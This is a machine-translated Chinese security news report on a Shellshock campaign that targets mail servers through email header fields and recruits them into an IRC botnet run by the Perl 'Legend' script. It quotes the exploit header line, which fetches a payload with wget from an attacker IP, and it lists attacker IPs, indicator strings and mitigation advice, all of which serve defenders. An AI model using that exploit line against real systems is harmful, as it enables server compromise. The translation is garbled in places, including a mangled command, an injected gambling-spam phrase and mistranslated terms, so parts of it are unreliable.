针对消息传输代理(MTAs)和邮件传递代理(MDAs),犯罪分子正在使用Shellshock作为创建僵尸网络的手段。这个过程很慢,但是可以工作,这要感谢Bash的未修补的安装或它的某些实现。
当它在九月份被披露时,Shellshock -Bash中支持命令执行的漏洞的通用名称-大大小小的系统都受到影响,在整个科技行业产生了涟漪。
供应商努力发布和维护补丁。在最初披露后的几天里,研究人员找到了绕过修复的方法,导致了发表四份额外的CVE报告与主要缺陷有关。
没过多久,实际上是几天,罪犯们就抓住了这个问题。9月27日,FireEye的研究人员公布了一些与Shellshock相关的概念验证脚本的细节。
“我们怀疑坏人可能正在进行初步演练,为一场真正的、可能规模更大的袭击做准备。我们认为,攻击者利用这个漏洞将用户重定向到恶意主机,这只是时间问题,这可能导致进一步的破坏。”FireEye当时写道。
他们是多么正确。FireEye的发现包括一个概念验证脚本,它创建了一个基于irc (Internet Relay Chat)的僵尸网络,能够发送垃圾邮件、发起DDoS攻击或在受损主机上执行远程命令。
周五,CSO意识到一场针对欧洲和美国组织的基于shellshock的运动。2020欧洲杯夺冠热门它通过电子邮件传播,在消息头字段中使用Shellshock利用代码。如果成功,它将提供一个简单的Perl脚本作为有效负载,它将主机添加到一个僵尸网络命令IRC中。
CSO的后续调查导致发现了一个IRC服务器用来托管机器人。截至10月24日,连接到该服务器的主机超过160台。
消息:
Shellshock战役的目标是邮件服务器,搜索脆弱的mta / MDAs。消息本身是空白的,但是利用Shellshock漏洞所需的代码被放在消息的头中。
在垃圾邮件爆炸背后的人包括以下代码在几个消息字段,包括“到:”字段,“从:”字段,“主题”字段,“日期:”字段,“消息ID:”和其他。
问题:(){:;}, wget - o / tmp /。xxp://190-94-251-41/传奇。txt;killall -9 perl
引用:(){:;}, wget - o / tmp /。xxp://190-94-251-41/传奇。txt;killall -9 perl
字段的完整列表和示例,这里是可用的。
一个样本的电子邮件消息-完整的头-这里是可用的这多亏了本杰明·桑塔格,他是公民倡导组织“网络正交”的联合创始人。
服务器:
由CSO标识的IRC服务器只是其中之一吗。它被安装在OVH网络上一个之前被破坏的Web服务器上,由一家专注于网络集成和信息安全的法国It公司维护。
在为这个故事进行研究时,控制机器人的人发现了我们,并立即发布了KLine,禁止我们进入服务器。
假定IRCd (IRC守护进程)存在于受损的主机上,并通过Telnet(端口23)访问;这家公司不太可能知道他们服务器的状态。CSO已经联系了IT公司,他们的网络主机,和OVH报告此事。
注意:到这篇报道付印时,我们联系的人都没有对这个问题做出回应。IRCd对我们来说是禁区,但对脉冲信号有反应。服务于恶意负载的域仍然处于活动状态。
有证据表明还有第二台服务器在德国的一个网络上本月早些时候,它托管了600多个机器人程序。这个早期的服务器和最近在法国发现的服务器之间的连接是IRCd、网络命名约定以及由同一个人管理的事实(基于登录细节)。
下面的IP地址与利用Shellshock作为攻击载体的事件相关联。
62.193.210.216
178.254.31.165
190.94.251.41
87.118.84.123
这些地址要么承载一个恶意的IRC网络,要么被用来传递恶意的有效负载。在CSO看到的攻击示例中,IP通过cURL通过HTTP(80端口)直接调用该主机。如果使用一个域来解析主机的IP,攻击者倾向于使用免费的服务,比如rima.tde.net。
除了检查上述IP地址的服务器日志外,管理员还应该检查服务器上是否有任何未知脚本正在运行。在这个运动中的机器人都是由Perl脚本管理,它将包含字符串的代码,很容易在grep的/tmp目录:
传说机器人[2011]
传说IRC [2010]
legend.rocks
@admins =(“上帝”、“ARZ”、“石斧”);
"正在安装模拟程序,请稍候"
这个脚本
在最近的行动背后,为僵尸网络提供能量的脚本叫做Legend,它已经存在好几年了。图例脚本很简单,但是一旦安装到系统上就很有效。它不是设计为秘密的,因此经常在扫描运行进程、TMP目录或网络流量时发现它。
使用Legend,被攻击的主机可以被要求做很多事情,包括打开反向shell,发送垃圾邮件,发起DDoS攻击,使用NMAP扫描网络,或者通过HTTP、TCP、UDP或SQL执行基本的拒绝服务。脚本还可以显示有关主机的敏感信息,或者将其转换为代理。
一旦安装完毕,Legend会将被攻击的主机连接到一个预先配置的IRC服务器上,在那里攻击者可以单独或作为一个团队发出命令。CSO已经看到了网上流传的两个传奇剧本的证据。第一个脚本的源代码见于9月底和10月初,这里是可用的。第二个剧本是最近的可在此浏览。
值得注意的是,在单独但相关的攻击中,已经识别出了第二个僵尸网络脚本。脚本,在头文件中称为“JST Perl IrcBot”,具有许多与Legend相同的功能。这是一种可能的有效载荷当Reddit上有人发现了同一个活动时CSO正在调查。
缓解:
以下mta / MDAs在某些情况下直接受到Shellshock的影响,具体取决于它们的配置。源链接将打开指向其他信息源的链接。
快递邮件服务器(源]
进出口(源]
至少有一个用于后缀的Shellshock漏洞在网上流传,触发了与本文所观察到的相同的攻击——Procmail源链接指向另一个可能的攻击向量。
Sendmail(源]
Sendmail容易受到攻击,这取决于它的配置方式。对于调用Sendmail的web脚本尤其如此。此类脚本的一个示例是sendmail-wrapper,它记录并限制PHP发送的电子邮件。这是修补与弹震症在它被披露后不久。
首先,最重要的缓解步骤是给Bash打补丁,以确保使用最新版本更新系统。所有主要的供应商和Linux发行版都发布了针对Shellshock的补丁,包括红帽、IBM、Juniper、思科、Debian、Ubuntu、VMware、McAfee和惠普。
这篇报道,“报告:犯罪分子使用Shellshock攻击邮件服务器建立僵尸网络”最初是由方案 。